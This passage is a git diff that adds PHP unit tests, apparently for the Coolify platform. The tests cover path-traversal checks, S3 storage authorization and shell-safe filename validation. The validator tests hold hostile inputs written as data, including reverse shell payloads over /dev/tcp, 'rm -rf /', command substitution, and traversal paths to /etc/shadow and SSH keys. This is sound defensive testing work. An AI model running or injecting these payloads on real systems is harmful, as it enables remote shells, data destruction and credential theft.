expect(isSafeTmpPath('/tmp/../etc/passwd'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/foo/../etc/passwd'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/foo/bar/../../etc/passwd'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/foo/../../../etc/passwd'))->toBeFalse(); + }); + + it('rejects paths that do not start with /tmp/', function () { + expect(isSafeTmpPath('/etc/passwd'))->toBeFalse(); + expect(isSafeTmpPath('/home/user/file.txt'))->toBeFalse(); + expect(isSafeTmpPath('/var/log/app.log'))->toBeFalse(); + expect(isSafeTmpPath('tmp/file.txt'))->toBeFalse(); // Missing leading / + expect(isSafeTmpPath('./tmp/file.txt'))->toBeFalse(); + }); + + it('handles double slashes by normalizing them', function () { + // Double slashes are normalized out, so these should pass + expect(isSafeTmpPath('/tmp//file.txt'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/foo//bar.txt'))->toBeTrue(); + }); + + it('handles relative directory references by normalizing them', function () { + // ./ references are normalized out, so these should pass + expect(isSafeTmpPath('/tmp/./file.txt'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/foo/./bar.txt'))->toBeTrue(); + }); + + it('handles trailing slashes correctly', function () { + expect(isSafeTmpPath('/tmp/file.txt/'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/subdir/'))->toBeTrue(); + }); + + it('rejects sophisticated path traversal attempts', function () { + // URL encoded .. will be decoded and then rejected + expect(isSafeTmpPath('/tmp/%2e%2e/etc/passwd'))->toBeFalse(); + + // Mixed case /TMP doesn't start with /tmp/ + expect(isSafeTmpPath('/TMP/file.txt'))->toBeFalse(); + expect(isSafeTmpPath('/TMP/../etc/passwd'))->toBeFalse(); + + // URL encoded slashes with .. (should decode to /tmp/../../etc/passwd) + expect(isSafeTmpPath('/tmp/..%2f..%2fetc/passwd'))->toBeFalse(); + + // Null byte injection attempt (if string contains it) + expect(isSafeTmpPath("/tmp/file.txt\0../../etc/passwd"))->toBeFalse(); + }); + + it('validates paths even when directories do not exist', function () { + // These paths don't exist but should be validated structurally + expect(isSafeTmpPath('/tmp/nonexistent/file.txt'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/totally/fake/deeply/nested/path.sql'))->toBeTrue(); + + // But traversal should still be blocked even if dir doesn't exist + expect(isSafeTmpPath('/tmp/nonexistent/../etc/passwd'))->toBeFalse(); + }); + + it('handles real path resolution when directory exists', function () { + // Create a real temp directory to test realpath() logic + $testDir = '/tmp/phpunit-test-'.uniqid(); + mkdir($testDir, 0755, true); + + try { + expect(isSafeTmpPath($testDir.'/file.txt'))->toBeTrue(); + expect(isSafeTmpPath($testDir.'/subdir/file.txt'))->toBeTrue(); + } finally { + rmdir($testDir); + } + }); + + it('prevents symlink-based traversal attacks', function () { + // Create a temp directory and symlink + $testDir = '/tmp/phpunit-symlink-test-'.uniqid(); + mkdir($testDir, 0755, true); + + // Try to create a symlink to /etc (may not work in all environments) + $symlinkPath = $testDir.'/evil-link'; + + try { + // Attempt to create symlink (skip test if not possible) + if (@symlink('/etc', $symlinkPath)) { + // If we successfully created a symlink to /etc, + // isSafeTmpPath should resolve it and reject paths through it + $testPath = $symlinkPath.'/passwd'; + + // The resolved path would be /etc/passwd, not /tmp/... + // So it should be rejected + $result = isSafeTmpPath($testPath); + + // Clean up before assertion + unlink($symlinkPath); + rmdir($testDir); + + expect($result)->toBeFalse(); + } else { + // Can't create symlink, skip this specific test + $this->markTestSkipped('Cannot create symlinks in this environment'); + } + } catch (Exception $e) { + // Clean up on any error + if (file_exists($symlinkPath)) { + unlink($symlinkPath); + } + if (file_exists($testDir)) { + rmdir($testDir); + } + throw $e; + } + }); + + it('has consistent behavior with or without trailing slash', function () { + expect(isSafeTmpPath('/tmp/file.txt'))->toBe(isSafeTmpPath('/tmp/file.txt/')); + expect(isSafeTmpPath('/tmp/subdir/file.sql'))->toBe(isSafeTmpPath('/tmp/subdir/file.sql/')); + }); +}); + +/** + * Integration test for S3RestoreJobFinished event using the secure path validation. + */ +describe('S3RestoreJobFinished path validation', function () { + it('validates that safe paths pass validation', function () { + // Test with valid paths - should pass validation + $validData = [ + 'serverTmpPath' => '/tmp/valid-backup.sql', + 'scriptPath' => '/tmp/valid-script.sh', + 'containerTmpPath' => '/tmp/container-file.sql', + ]; + + expect(isSafeTmpPath($validData['serverTmpPath']))->toBeTrue(); + expect(isSafeTmpPath($validData['scriptPath']))->toBeTrue(); + expect(isSafeTmpPath($validData['containerTmpPath']))->toBeTrue(); + }); + + it('validates that malicious paths fail validation', function () { + // Test with malicious paths - should fail validation + $maliciousData = [ + 'serverTmpPath' => '/tmp/../etc/passwd', + 'scriptPath' => '/tmp/../../etc/shadow', + 'containerTmpPath' => '/etc/important-config', + ]; + + // Verify that our helper would reject these paths + expect(isSafeTmpPath($maliciousData['serverTmpPath']))->toBeFalse(); + expect(isSafeTmpPath($maliciousData['scriptPath']))->toBeFalse(); + expect(isSafeTmpPath($maliciousData['containerTmpPath']))->toBeFalse(); + }); + + it('validates realistic S3 restore paths', function () { + // These are the kinds of paths that would actually be used + $realisticPaths = [ + '/tmp/coolify-s3-restore-'.uniqid().'.sql', + '/tmp/db-backup-'.date('Y-m-d').'.dump', + '/tmp/restore-script-'.uniqid().'.sh', + ]; + + foreach ($realisticPaths as $path) { + expect(isSafeTmpPath($path))->toBeTrue(); + } + }); +}); diff --git a/tests/Unit/Policies/S3StoragePolicyTest.php b/tests/Unit/Policies/S3StoragePolicyTest.php new file mode 100644 index 000000000..4ea580d0f --- /dev/null +++ b/tests/Unit/Policies/S3StoragePolicyTest.php @@ -0,0 +1,149 @@ + 1, 'pivot' => (object) ['role' => 'member']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(1); + $storage->team_id = 1; + + $policy = new S3StoragePolicy; + expect($policy->view($user, $storage))->toBeTrue(); +}); + +it('denies team member to view S3 storage from another team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'owner']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(2); + $storage->team_id = 2; + + $policy = new S3StoragePolicy; + expect($policy->view($user, $storage))->toBeFalse(); +}); + +it('allows team admin to update S3 storage from their team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'admin']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(1); + $storage->team_id = 1; + + $policy = new S3StoragePolicy; + expect($policy->update($user, $storage))->toBeTrue(); +}); + +it('denies team member to update S3 storage from another team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'admin']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(2); + $storage->team_id = 2; + + $policy = new S3StoragePolicy; + expect($policy->update($user, $storage))->toBeFalse(); +}); + +it('allows team member to delete S3 storage from their team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'member']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(1); + $storage->team_id = 1; + + $policy = new S3StoragePolicy; + expect($policy->delete($user, $storage))->toBeTrue(); +}); + +it('denies team member to delete S3 storage from another team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'owner']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(2); + $storage->team_id = 2; + + $policy = new S3StoragePolicy; + expect($policy->delete($user, $storage))->toBeFalse(); +}); + +it('allows admin to create S3 storage', function () { + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('isAdmin')->andReturn(true); + + $policy = new S3StoragePolicy; + expect($policy->create($user))->toBeTrue(); +}); + +it('denies non-admin to create S3 storage', function () { + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('isAdmin')->andReturn(false); + + $policy = new S3StoragePolicy; + expect($policy->create($user))->toBeFalse(); +}); + +it('allows team member to validate connection of S3 storage from their team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'member']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(1); + $storage->team_id = 1; + + $policy = new S3StoragePolicy; + expect($policy->validateConnection($user, $storage))->toBeTrue(); +}); + +it('denies team member to validate connection of S3 storage from another team', function () { + $teams = collect([ + (object) ['id' => 1, 'pivot' => (object) ['role' => 'admin']], + ]); + + $user = Mockery::mock(User::class)->makePartial(); + $user->shouldReceive('getAttribute')->with('teams')->andReturn($teams); + + $storage = Mockery::mock(S3Storage::class)->makePartial(); + $storage->shouldReceive('getAttribute')->with('team_id')->andReturn(2); + $storage->team_id = 2; + + $policy = new S3StoragePolicy; + expect($policy->validateConnection($user, $storage))->toBeFalse(); +}); diff --git a/tests/Unit/PostgresqlInitScriptSecurityTest.php b/tests/Unit/PostgresqlInitScriptSecurityTest.php new file mode 100644 index 000000000..4f74b13a4 --- /dev/null +++ b/tests/Unit/PostgresqlInitScriptSecurityTest.php @@ -0,0 +1,76 @@ + validateShellSafePath('test$(whoami)', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects command injection with semicolon', function () { + expect(fn () => validateShellSafePath('test; rm -rf /', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects command injection with pipe', function () { + expect(fn () => validateShellSafePath('test | whoami', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects command injection with backticks', function () { + expect(fn () => validateShellSafePath('test`id`', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects command injection with ampersand', function () { + expect(fn () => validateShellSafePath('test && whoami', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects command injection with redirect operators', function () { + expect(fn () => validateShellSafePath('test > /tmp/evil', 'init script filename')) + ->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('test < /etc/passwd', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script rejects reverse shell payload', function () { + expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/4444 0>&1)', 'init script filename')) + ->toThrow(Exception::class); +}); + +test('postgresql init script escapes filenames properly', function () { + $filename = "init'script.sql"; + $escaped = escapeshellarg($filename); + + expect($escaped)->toBe("'init'\\''script.sql'"); +}); + +test('postgresql init script escapes special characters', function () { + $filename = 'init script with spaces.sql'; + $escaped = escapeshellarg($filename); + + expect($escaped)->toBe("'init script with spaces.sql'"); +}); + +test('postgresql init script accepts legitimate filenames', function () { + expect(fn () => validateShellSafePath('init.sql', 'init script filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('01_schema.sql', 'init script filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('init-script.sh', 'init script filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('setup_db.sql', 'init script filename')) + ->not->toThrow(Exception::class); +}); diff --git a/tests/Unit/Project/Database/ImportCheckFileButtonTest.php b/tests/Unit/Project/Database/ImportCheckFileButtonTest.php new file mode 100644 index 000000000..a305160c0 --- /dev/null +++ b/tests/Unit/Project/Database/ImportCheckFileButtonTest.php @@ -0,0 +1,128 @@ +customLocation = ''; + + $mockServer = Mockery::mock(Server::class); + $component->server = $mockServer; + + // No server commands should be executed when customLocation is empty + $component->checkFile(); + + expect($component->filename)->toBeNull(); +}); + +test('checkFile validates file exists on server when customLocation is filled', function () { + $component = new Import; + $component->customLocation = '/tmp/backup.sql'; + + $mockServer = Mockery::mock(Server::class); + $component->server = $mockServer; + + // This test verifies the logic flows when customLocation has a value + // The actual remote process execution is tested elsewhere + expect($component->customLocation)->toBe('/tmp/backup.sql'); +}); + +test('customLocation can be cleared to allow uploaded file to be used', function () { + $component = new Import; + $component->customLocation = '/tmp/backup.sql'; + + // Simulate clearing the customLocation (as happens when file is uploaded) + $component->customLocation = ''; + + expect($component->customLocation)->toBe(''); +}); + +test('validateBucketName accepts valid bucket names', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateBucketName'); + + // Valid bucket names + expect($method->invoke($component, 'my-bucket'))->toBeTrue(); + expect($method->invoke($component, 'my_bucket'))->toBeTrue(); + expect($method->invoke($component, 'mybucket123'))->toBeTrue(); + expect($method->invoke($component, 'my.bucket.name'))->toBeTrue(); + expect($method->invoke($component, 'Bucket-Name_123'))->toBeTrue(); +}); + +test('validateBucketName rejects invalid bucket names', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateBucketName'); + + // Invalid bucket names (command injection attempts) + expect($method->invoke($component, 'bucket;rm -rf /'))->toBeFalse(); + expect($method->invoke($component, 'bucket$(whoami)'))->toBeFalse(); + expect($method->invoke($component, 'bucket`id`'))->toBeFalse(); + expect($method->invoke($component, 'bucket|cat /etc/passwd'))->toBeFalse(); + expect($method->invoke($component, 'bucket&ls'))->toBeFalse(); + expect($method->invoke($component, "bucket\nid"))->toBeFalse(); + expect($method->invoke($component, 'bucket name'))->toBeFalse(); // Space not allowed in bucket +}); + +test('validateS3Path accepts valid S3 paths', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateS3Path'); + + // Valid S3 paths + expect($method->invoke($component, 'backup.sql'))->toBeTrue(); + expect($method->invoke($component, 'folder/backup.sql'))->toBeTrue(); + expect($method->invoke($component, 'my-folder/my_backup.sql.gz'))->toBeTrue(); + expect($method->invoke($component, 'path/to/deep/file.tar.gz'))->toBeTrue(); + expect($method->invoke($component, 'folder with space/file.sql'))->toBeTrue(); +}); + +test('validateS3Path rejects invalid S3 paths', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateS3Path'); + + // Invalid S3 paths (command injection attempts) + expect($method->invoke($component, ''))->toBeFalse(); // Empty + expect($method->invoke($component, '../etc/passwd'))->toBeFalse(); // Directory traversal + expect($method->invoke($component, 'path;rm -rf /'))->toBeFalse(); + expect($method->invoke($component, 'path$(whoami)'))->toBeFalse(); + expect($method->invoke($component, 'path`id`'))->toBeFalse(); + expect($method->invoke($component, 'path|cat /etc/passwd'))->toBeFalse(); + expect($method->invoke($component, 'path&ls'))->toBeFalse(); + expect($method->invoke($component, "path\nid"))->toBeFalse(); + expect($method->invoke($component, "path\r\nid"))->toBeFalse(); + expect($method->invoke($component, "path\0id"))->toBeFalse(); // Null byte + expect($method->invoke($component, "path'injection"))->toBeFalse(); + expect($method->invoke($component, 'path"injection'))->toBeFalse(); + expect($method->invoke($component, 'path\\injection'))->toBeFalse(); +}); + +test('validateServerPath accepts valid server paths', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateServerPath'); + + // Valid server paths (must be absolute) + expect($method->invoke($component, '/tmp/backup.sql'))->toBeTrue(); + expect($method->invoke($component, '/var/backups/my-backup.sql'))->toBeTrue(); + expect($method->invoke($component, '/home/user/data_backup.sql.gz'))->toBeTrue(); + expect($method->invoke($component, '/path/to/deep/nested/file.tar.gz'))->toBeTrue(); +}); + +test('validateServerPath rejects invalid server paths', function () { + $component = new Import; + $method = new ReflectionMethod($component, 'validateServerPath'); + + // Invalid server paths + expect($method->invoke($component, 'relative/path.sql'))->toBeFalse(); // Not absolute + expect($method->invoke($component, '/path/../etc/passwd'))->toBeFalse(); // Directory traversal + expect($method->invoke($component, '/path;rm -rf /'))->toBeFalse(); + expect($method->invoke($component, '/path$(whoami)'))->toBeFalse(); + expect($method->invoke($component, '/path`id`'))->toBeFalse(); + expect($method->invoke($component, '/path|cat /etc/passwd'))->toBeFalse(); + expect($method->invoke($component, '/path&ls'))->toBeFalse(); + expect($method->invoke($component, "/path\nid"))->toBeFalse(); + expect($method->invoke($component, "/path\r\nid"))->toBeFalse(); + expect($method->invoke($component, "/path\0id"))->toBeFalse(); // Null byte + expect($method->invoke($component, "/path'injection"))->toBeFalse(); + expect($method->invoke($component, '/path"injection'))->toBeFalse(); + expect($method->invoke($component, '/path\\injection'))->toBeFalse(); +}); diff --git a/tests/Unit/ProxyConfigurationSecurityTest.php b/tests/Unit/ProxyConfigurationSecurityTest.php new file mode 100644 index 000000000..72c5e4c3a --- /dev/null +++ b/tests/Unit/ProxyConfigurationSecurityTest.php @@ -0,0 +1,83 @@ + validateShellSafePath('test$(whoami)', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects command injection with semicolon', function () { + expect(fn () => validateShellSafePath('config; id > /tmp/pwned', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects command injection with pipe', function () { + expect(fn () => validateShellSafePath('config | cat /etc/passwd', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects command injection with backticks', function () { + expect(fn () => validateShellSafePath('config`whoami`.yaml', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects command injection with ampersand', function () { + expect(fn () => validateShellSafePath('config && rm -rf /', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects command injection with redirect operators', function () { + expect(fn () => validateShellSafePath('test > /tmp/evil', 'proxy configuration filename')) + ->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('test < /etc/shadow', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration rejects reverse shell payload', function () { + expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/9999 0>&1)', 'proxy configuration filename')) + ->toThrow(Exception::class); +}); + +test('proxy configuration escapes filenames properly', function () { + $filename = "config'test.yaml"; + $escaped = escapeshellarg($filename); + + expect($escaped)->toBe("'config'\\''test.yaml'"); +}); + +test('proxy configuration escapes filenames with spaces', function () { + $filename = 'my config.yaml'; + $escaped = escapeshellarg($filename); + + expect($escaped)->toBe("'my config.yaml'"); +}); + +test('proxy configuration accepts legitimate Traefik filenames', function () { + expect(fn () => validateShellSafePath('my-service.yaml', 'proxy configuration filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('app.yml', 'proxy configuration filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('router_config.yaml', 'proxy configuration filename')) + ->not->toThrow(Exception::class); +}); + +test('proxy configuration accepts legitimate Caddy filenames', function () { + expect(fn () => validateShellSafePath('my-service.caddy', 'proxy configuration filename')) + ->not->toThrow(Exception::class); + + expect(fn () => validateShellSafePath('app_config.caddy', 'proxy configuration filename')) + ->not->toThrow(Exception::class); +}); diff --git a/tests/Unit/ProxyHelperTest.php b/tests/Unit/ProxyHelperTest.php new file mode 100644 index 000000000..563d9df1b --- /dev/null +++ b/tests/Unit/ProxyHelperTest.php @@ -0,0 +1,155 @@ +andReturn(null); + Log::shouldReceive('error')->andReturn(null); +}); + +it('parses traefik version with v prefix', function () { + $image = 'traefik:v3.6'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('v3.6'); +}); + +it('parses traefik version without v prefix', function () { + $image = 'traefik:3.6.0'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('3.6.0'); +}); + +it('parses traefik latest tag', function () { + $image = 'traefik:latest'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('latest'); +}); + +it('parses traefik version with patch number', function () { + $image = 'traefik:v3.5.1'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('v3.5.1'); +}); + +it('parses traefik version with minor only', function () { + $image = 'traefik:3.6'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('3.6'); +}); + +it('returns null for invalid image format', function () { + $image = 'nginx:latest'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches)->toBeEmpty(); +}); + +it('returns null for empty image string', function () { + $image = ''; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches)->toBeEmpty(); +}); + +it('handles case insensitive traefik image name', function () { + $image = 'TRAEFIK:v3.6'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('v3.6'); +}); + +it('parses full docker image with registry', function () { + $image = 'docker.io/library/traefik:v3.6'; + preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches); + + expect($matches[1])->toBe('v3.6'); +}); + +it('compares versions correctly after stripping v prefix', function () { + $version1 = 'v3.5'; + $version2 = 'v3.6'; + + $result = version_compare(ltrim($version1, 'v'), ltrim($version2, 'v'), '<'); + + expect($result)->toBeTrue(); +}); + +it('compares same versions as equal', function () { + $version1 = 'v3.6'; + $version2 = '3.6'; + + $result = version_compare(ltrim($version1, 'v'), ltrim($version2, 'v'), '='); + + expect($result)->toBeTrue(); +}); + +it('compares versions with patch numbers', function () { + $version1 = '3.5.1'; + $version2 = '3.6.0'; + + $result = version_compare($version1, $version2, '<'); + + expect($result)->toBeTrue(); +}); + +it('parses exact version from traefik version command output', function () { + $output = "Version: 3.6.0\nCodename: ramequin\nGo version: go1.24.10"; + preg_match('/Version:\s+(\d+\.\d+\.\d+)/', $output, $matches); + + expect($matches[1])->toBe('3.6.0'); +}); + +it('parses exact version from OCI label with v prefix', function () { + $label = 'v3.6.0'; + preg_match('/(\d+\.\d+\.\d+)/', $label, $matches); + + expect($matches[1])->toBe('3.6.0'); +}); + +it('parses exact version from OCI label without v prefix', function () { + $label = '3.6.0'; + preg_match('/(\d+\.\d+\.\d+)/', $label, $matches); + + expect($matches[1])->toBe('3.6.0'); +}); + +it('extracts major.minor branch from full version', function () { + $version = '3.6.0'; + preg_match('/^(\d+\.\d+)\.(\d+)$/', $version, $matches); + + expect($matches[1])->toBe('3.6'); // branch + expect($matches[2])->toBe('0'); // patch +}); + +it('compares patch versions within same branch', function () { + $current = '3.6.0'; + $latest = '3.6.2'; + + $result = version_compare($current, $latest, '<'); + + expect($result)->toBeTrue(); +}); + +it('detects up-to-date patch version', function () { + $current = '3.6.2'; + $latest = '3.6.2'; + + $result = version_compare($current, $latest, '='); + + expect($result)->toBeTrue(); +}); + +it('compares branches for minor upgrades', function () { + $currentBranch = '3.5'; + $newerBranch = '3.6'; + + $result = version_compare($currentBranch, $newerBranch, '<'); + + expect($result)->toBeTrue(); +}); diff --git a/tests/Unit/RestartCountTrackingTest.php b/tests/Unit/RestartCountTrackingTest.php new file mode 100644 index 000000000..252ce56ce --- /dev/null +++ b/tests/Unit/RestartCountTrackingTest.php @@ -0,0 +1,82 @@ +server = Mockery::mock(Server::class); + $this->server->shouldReceive('isFunctional')->andReturn(true); + $this->server->shouldReceive('isSwarm')->andReturn(false); + $this->server->shouldReceive('applications')->andReturn(collect()); + + // Mock application + $this->application = Mockery::mock(Application::class); + $this->application->shouldReceive('getAttribute')->with('id')->andReturn(1); + $this->application->shouldReceive('getAttribute')->with('name')->andReturn('test-app'); + $this->application->shouldReceive('getAttribute')->with('restart_count')->andReturn(0); + $this->application->shouldReceive('getAttribute')->with('uuid')->andReturn('test-uuid'); + $this->application->shouldReceive('getAttribute')->with('environment')->andReturn(null); +}); + +it('extracts restart count from container data', function () { + $containerData = [ + 'RestartCount' => 5, + 'State' => [ + 'Status' => 'running', + 'Health' => ['Status' => 'healthy'], + ], + 'Config' => [ + 'Labels' => [ + 'coolify.applicationId' => '1', + 'com.docker.compose.service' => 'web', + ], + ], + ]; + + $restartCount = data_get($containerData, 'RestartCount', 0); + + expect($restartCount)->toBe(5); +}); + +it('defaults to zero when restart count is missing', function () { + $containerData = [ + 'State' => [ + 'Status' => 'running', + ], + 'Config' => [ + 'Labels' => [], + ], + ]; + + $restartCount = data_get($containerData, 'RestartCount', 0); + + expect($restartCount)->toBe(0); +}); + +it('detects restart count increase', function () { + $previousRestartCount = 2; + $currentRestartCount = 5; + + expect($currentRestartCount)->toBeGreaterThan($previousRestartCount); +}); + +it('identifies maximum restart count from multiple containers', function () { + $containerRestartCounts = collect([ + 'web' => 3, + 'worker' => 5, + 'scheduler' => 1, + ]); + + $maxRestartCount = $containerRestartCounts->max(); + + expect($maxRestartCount)->toBe(5); +}); + +it('handles empty restart counts collection', function () { + $containerRestartCounts = collect([]); + + $maxRestartCount = $containerRestartCounts->max() ?? 0; + + expect($maxRestartCount)->toBe(0); +}); diff --git a/tests/Unit/RestoreJobFinishedNullServerTest.php b/tests/Unit/RestoreJobFinishedNullServerTest.php new file mode 100644 index 000000000..d3dfb2f9a --- /dev/null +++ b/tests/Unit/RestoreJobFinishedNullServerTest.php @@ -0,0 +1,93 @@ +shouldReceive('find') + ->with(999) + ->andReturn(null); + + $data = [ + 'scriptPath' => '/tmp/script.sh', + 'tmpPath' => '/tmp/backup.sql', + 'container' => 'test-container', + 'serverId' => 999, + ]; + + // Should not throw an error when server is null + expect(fn () => new RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); + + it('handles null server gracefully in S3RestoreJobFinished event', function () { + // Mock Server::find to return null (server was deleted) + $mockServer = Mockery::mock('alias:'.Server::class); + $mockServer->shouldReceive('find') + ->with(999) + ->andReturn(null); + + $data = [ + 'containerName' => 'helper-container', + 'serverTmpPath' => '/tmp/downloaded.sql', + 'scriptPath' => '/tmp/script.sh', + 'containerTmpPath' => '/tmp/container-file.sql', + 'container' => 'test-container', + 'serverId' => 999, + ]; + + // Should not throw an error when server is null + expect(fn () => new S3RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); + + it('handles empty serverId in RestoreJobFinished event', function () { + $data = [ + 'scriptPath' => '/tmp/script.sh', + 'tmpPath' => '/tmp/backup.sql', + 'container' => 'test-container', + 'serverId' => null, + ]; + + // Should not throw an error when serverId is null + expect(fn () => new RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); + + it('handles empty serverId in S3RestoreJobFinished event', function () { + $data = [ + 'containerName' => 'helper-container', + 'serverTmpPath' => '/tmp/downloaded.sql', + 'scriptPath' => '/tmp/script.sh', + 'containerTmpPath' => '/tmp/container-file.sql', + 'container' => 'test-container', + 'serverId' => null, + ]; + + // Should not throw an error when serverId is null + expect(fn () => new S3RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); + + it('handles missing data gracefully in RestoreJobFinished', function () { + $data = []; + + // Should not throw an error when data is empty + expect(fn () => new RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); + + it('handles missing data gracefully in S3RestoreJobFinished', function () { + $data = []; + + // Should not throw an error when data is empty + expect(fn () => new S3RestoreJobFinished($data))->not->toThrow(\Throwable::class); + }); +}); diff --git a/tests/Unit/RestoreJobFinishedSecurityTest.php b/tests/Unit/RestoreJobFinishedSecurityTest.php new file mode 100644 index 000000000..0f3dca08c --- /dev/null +++ b/tests/Unit/RestoreJobFinishedSecurityTest.php @@ -0,0 +1,61 @@ +toBeTrue(); + } + }); + + it('validates that malicious paths fail validation', function () { + $maliciousPaths = [ + '/tmp/../etc/passwd', + '/tmp/foo/../../etc/shadow', + '/etc/sensitive-file', + '/var/www/config.php', + '/tmp/../../../root/.ssh/id_rsa', + ]; + + foreach ($maliciousPaths as $path) { + expect(isSafeTmpPath($path))->toBeFalse(); + } + }); + + it('rejects URL-encoded path traversal attempts', function () { + $encodedTraversalPaths = [ + '/tmp/%2e%2e/etc/passwd', + '/tmp/foo%2f%2e%2e%2f%2e%2e/etc/shadow', + urlencode('/tmp/../etc/passwd'), + ]; + + foreach ($encodedTraversalPaths as $path) { + expect(isSafeTmpPath($path))->toBeFalse(); + } + }); + + it('handles edge cases correctly', function () { + // Too short + expect(isSafeTmpPath('/tmp'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/'))->toBeFalse(); + + // Null/empty + expect(isSafeTmpPath(null))->toBeFalse(); + expect(isSafeTmpPath(''))->toBeFalse(); + + // Null byte injection + expect(isSafeTmpPath("/tmp/file.sql\0../../etc/passwd"))->toBeFalse(); + + // Valid edge cases + expect(isSafeTmpPath('/tmp/x'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/very/deeply/nested/path/to/file.sql'))->toBeTrue(); + }); +}); diff --git a/tests/Unit/RestoreJobFinishedShellEscapingTest.php b/tests/Unit/RestoreJobFinishedShellEscapingTest.php new file mode 100644 index 000000000..e45ec966b --- /dev/null +++ b/tests/Unit/RestoreJobFinishedShellEscapingTest.php @@ -0,0 +1,118 @@ +toBeTrue(); + + // But when escaped, the shell metacharacters become literal strings + $escaped = escapeshellarg($maliciousPath); + + // The escaped version wraps in single quotes and escapes internal single quotes + expect($escaped)->toBe("'/tmp/file'\\''; whoami; '\\'''"); + 